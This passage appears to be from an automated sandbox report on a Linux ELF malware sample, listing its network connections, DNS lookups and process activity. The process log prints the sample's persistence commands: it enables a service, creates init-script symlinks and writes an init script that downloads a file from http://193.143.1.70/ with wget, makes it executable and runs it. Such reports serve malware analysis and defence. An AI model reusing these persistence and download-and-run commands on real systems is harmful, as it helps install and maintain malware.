Nov 24, 2024 05:02:56.432389975 CET | 40300 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:56.433010101 CET | 199 | 40298 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:56.444963932 CET | 40300 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:56.552581072 CET | 199 | 40300 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:56.609018087 CET | 199 | 40300 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:57.621618032 CET | 199 | 40286 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:57.621676922 CET | 40286 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:57.705032110 CET | 199 | 40288 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:57.705137968 CET | 40288 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:57.876738071 CET | 199 | 40290 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:57.876857996 CET | 40290 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:58.017239094 CET | 199 | 40292 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:58.017309904 CET | 40292 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:58.183329105 CET | 199 | 40294 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:58.183412075 CET | 40294 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:58.235399961 CET | 199 | 40296 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:58.235475063 CET | 40296 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:58.557904959 CET | 199 | 40298 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:58.557971954 CET | 40298 | 199 | 192.168.2.13 | 154.216.19.139 |
Nov 24, 2024 05:02:58.624849081 CET | 199 | 40300 | 154.216.19.139 | 192.168.2.13 |
Nov 24, 2024 05:02:58.624917030 CET | 40300 | 199 | 192.168.2.13 | 154.216.19.139 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 24, 2024 05:02:58.068034887 CET | 50795 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 24, 2024 05:02:58.068089962 CET | 49350 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 24, 2024 05:02:58.190403938 CET | 53 | 49350 | 8.8.8.8 | 192.168.2.13 |
Nov 24, 2024 05:02:58.201539993 CET | 53 | 50795 | 8.8.8.8 | 192.168.2.13 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Nov 24, 2024 05:02:58.068034887 CET | 192.168.2.13 | 8.8.8.8 | 0x52a7 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 24, 2024 05:02:58.068089962 CET | 192.168.2.13 | 8.8.8.8 | 0xe648 | Standard query (0) | 28 | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Nov 24, 2024 05:02:58.201539993 CET | 8.8.8.8 | 192.168.2.13 | 0x52a7 | No error (0) | 162.213.35.25 | A (IP address) | IN (0x0001) | false | ||
Nov 24, 2024 05:02:58.201539993 CET | 8.8.8.8 | 192.168.2.13 | 0x52a7 | No error (0) | 162.213.35.24 | A (IP address) | IN (0x0001) | false |
System Behavior
Start time (UTC): | 04:02:53 |
Start date (UTC): | 24/11/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | /tmp/m68k.nn.elf |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 04:02:53 |
Start date (UTC): | 24/11/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /bin/sh |
Arguments: | sh -c "systemctl enable custom.service >/dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/bin/systemctl |
Arguments: | systemctl enable custom.service |
File size: | 996584 bytes |
MD5 hash: | 4deddfb6741481f68aeac522cc26ff4b |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /bin/sh |
Arguments: | sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/bin/chmod |
Arguments: | chmod +x /etc/init.d/system |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /bin/sh |
Arguments: | sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/bin/ln |
Arguments: | ln -s /etc/init.d/system /etc/rcS.d/S99system |
File size: | 76160 bytes |
MD5 hash: | e933cf05571f62c0157d4e2dfcaea282 |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /bin/sh |
Arguments: | sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /bin/sh |
Arguments: | sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/bin/chmod |
Arguments: | chmod +x /etc/init.d/m68k.nn.elf |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /bin/sh |
Arguments: | sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 04:02:55 |
Start date (UTC): | 24/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 04:02:55 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/bin/mkdir |
Arguments: | mkdir -p /etc/rc.d |
File size: | 88408 bytes |
MD5 hash: | 088c9d1df5a28ed16c726eca15964cb7 |
Start time (UTC): | 04:02:55 |
Start date (UTC): | 24/11/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 04:02:55 |
Start date (UTC): | 24/11/2024 |
Path: | /bin/sh |
Arguments: | sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 04:02:55 |
Start date (UTC): | 24/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 04:02:55 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/bin/ln |
Arguments: | ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf |
File size: | 76160 bytes |
MD5 hash: | e933cf05571f62c0157d4e2dfcaea282 |
Start time (UTC): | 04:02:55 |
Start date (UTC): | 24/11/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 04:02:53 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/lib/udisks2/udisksd |
Arguments: | - |
File size: | 483056 bytes |
MD5 hash: | 1d7ae439cc3d82fa6b127671ce037a24 |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/sbin/dumpe2fs |
Arguments: | dumpe2fs -h /dev/dm-0 |
File size: | 31112 bytes |
MD5 hash: | 5c66f7d8f7681a40562cf049ad4b72b4 |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/lib/udisks2/udisksd |
Arguments: | - |
File size: | 483056 bytes |
MD5 hash: | 1d7ae439cc3d82fa6b127671ce037a24 |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/sbin/dumpe2fs |
Arguments: | dumpe2fs -h /dev/dm-0 |
File size: | 31112 bytes |
MD5 hash: | 5c66f7d8f7681a40562cf049ad4b72b4 |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/libexec/gnome-session-binary |
Arguments: | - |
File size: | 334664 bytes |
MD5 hash: | d9b90be4f7db60cb3c2d3da6a1d31bfb |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /bin/sh |
Arguments: | /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/libexec/gsd-housekeeping |
Arguments: | /usr/libexec/gsd-housekeeping |
File size: | 51840 bytes |
MD5 hash: | b55f3394a84976ddb92a2915e5d76914 |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/lib/systemd/systemd |
Arguments: | - |
File size: | 1620224 bytes |
MD5 hash: | 9b2bec7092a40488108543f9334aab75 |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
Arguments: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File size: | 22760 bytes |
MD5 hash: | 3633b075f40283ec938a2a6a89671b0e |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/sbin/gdm3 |
Arguments: | - |
File size: | 453296 bytes |
MD5 hash: | 2492e2d8d34f9377e3e530a61a15674f |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /etc/gdm3/PrimeOff/Default |
Arguments: | /etc/gdm3/PrimeOff/Default |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/sbin/gdm3 |
Arguments: | - |
File size: | 453296 bytes |
MD5 hash: | 2492e2d8d34f9377e3e530a61a15674f |
Start time (UTC): | 04:02:54 |
Start date (UTC): | 24/11/2024 |
Path: | /etc/gdm3/PrimeOff/Default |
Arguments: | /etc/gdm3/PrimeOff/Default |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 04:02:55 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/lib/udisks2/udisksd |
Arguments: | - |
File size: | 483056 bytes |
MD5 hash: | 1d7ae439cc3d82fa6b127671ce037a24 |
Start time (UTC): | 04:02:55 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/sbin/dumpe2fs |
Arguments: | dumpe2fs -h /dev/dm-0 |
File size: | 31112 bytes |
MD5 hash: | 5c66f7d8f7681a40562cf049ad4b72b4 |
Start time (UTC): | 04:02:55 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/lib/udisks2/udisksd |
Arguments: | - |
File size: | 483056 bytes |
MD5 hash: | 1d7ae439cc3d82fa6b127671ce037a24 |
Start time (UTC): | 04:02:55 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/sbin/dumpe2fs |
Arguments: | dumpe2fs -h /dev/dm-0 |
File size: | 31112 bytes |
MD5 hash: | 5c66f7d8f7681a40562cf049ad4b72b4 |
Start time (UTC): | 04:02:56 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/lib/udisks2/udisksd |
Arguments: | - |
File size: | 483056 bytes |
MD5 hash: | 1d7ae439cc3d82fa6b127671ce037a24 |
Start time (UTC): | 04:02:56 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/sbin/dumpe2fs |
Arguments: | dumpe2fs -h /dev/dm-0 |
File size: | 31112 bytes |
MD5 hash: | 5c66f7d8f7681a40562cf049ad4b72b4 |
Start time (UTC): | 04:03:04 |
Start date (UTC): | 24/11/2024 |
Path: | /usr/lib/systemd/systemd |
Arguments: | - |
File size: | 1620224 bytes |
MD5 hash: | 9b2bec7092a40488108543f9334aab75 |
Start time (UTC): | 04:03:04 |
Start date (UTC): | 24/11/2024 |
Path: | /lib/systemd/systemd-user-runtime-dir |
Arguments: | /lib/systemd/systemd-user-runtime-dir stop 127 |
File size: | 22672 bytes |
MD5 hash: | d55f4b0847f88131dbcfb07435178e54 |